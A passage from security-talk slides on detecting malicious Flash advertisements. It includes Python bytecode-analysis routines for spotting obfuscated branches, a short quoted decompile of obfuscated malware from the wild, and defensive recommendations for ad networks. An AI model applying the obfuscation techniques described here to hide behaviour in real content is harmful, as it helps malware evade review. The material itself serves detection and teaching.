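    listing, boundaries = linear_sweep(data)
    targets = [int(note[3:]) for _, name, note in listing if name in ("branch", "branchIfTrue")]
    return [t for t in targets if t not in boundaries]


def recursive_traversal(data):
    """Follow control flow as the player does: every branch target is a new decode point."""
    seen, work, records, pools = set(), [0], {}, []
    while work:
        pos = work.pop()
        while 0 <= pos < len(data) and pos not in seen:
            seen.add(pos)
            code, payload, nxt = decode_action(data, pos)
            records[pos] = ACTION_NAMES.get(code, f"action_{code:02x}")
            if code == 0x88:
                pools.append(constant_pool(payload))
            if code == 0x00:
                break
            if code == 0x99:                                      # unconditional: follow it
                pos = nxt + struct.unpack_from("<h", payload)[0]
                continue
            if code == 0x9D:                                      # conditional: queue the target
                work.append(nxt + struct.unpack_from("<h", payload)[0])
            pos = nxt
    return records, pools
```

The fingerprint is cheap to check at scale: a branch whose target is not a record boundary of the linear sweep, or a push whose payload does not parse, is reason enough to queue a creative for manual review, whatever the decompiler says.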
Slide 50: Bytecode Obfuscation
- This obfuscation technique is documented at http://www.gotoandplay.it/_articles/2004/04/swfProtection.php
- Not a new technique, but this example has been seen in the wild: the malware author read this article! The BlessedAds malware contains strings used in one of the examples on that page.
- Some tools will detect these obfuscations (e.g. Manitu's ASV).
Slide 51: Obfuscation Seen in the Wild
Flare decompile of the diepress.com malware (http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx). Note the unknown tags, the variable whose name is made of non-displayable characters, and the dead for(;;) loops:
// unknown tag 255 length 1
// unknown tag 777 length 3
movieClip 4680 {
  #initclip
  function () {
    for (;;) {
      return (164 % 511) * 5;
      var  = -785 + ();
      for (;;) {
Slide 52: Goal of Analysis
- Analysis to achieve detection: reduce the risk that malicious content is served by your organisation. There is a large reputational impact if malware is even associated with your organisation.
- Limitations: ad click-through targets are controlled by third parties, so you cannot prevent an attacker modifying the target site to become malicious after review. The same issue applies if third-party interactions (tracking calls) are allowed in the background.
Slide 53: Addressing the Risk
- Contractual controls: a "terms of use" approach; complicated by the supply chain of federated ads.
- Reactive controls: a mechanism for users to report malicious ads; an effective incident response program.
- Technical controls: need to determine the exact program functionality; a signal detection problem, since malicious ads can be very similar to legitimate ads.
Slide 54: What About Volume?
- Even basic obfuscation results in very time-consuming manual analysis.
- Advertising organisations deal with thousands of campaigns, each with their own creatives.
- Questions to ask: why would a legitimate ad use obfuscation? Why would a legitimate ad call certain functions or class names?
- An automated approach can find suspicious files to be marked for further analysis.
Slide 55: Recommendations
- Develop a combination of automated and manual analysis procedures to increase detection of malicious advertisements.
- Use ad templates to restrict the available functionality and make analysis easier.
- Require the third party to provide source code.
- Implement good incident detection and response processes.
Slide 56: Questions?
Slide 57: SIFT Pty Ltd, Australia. The detection and analysis of Flash based malware. Paul Theriault [paul.theriault@sift.com.au]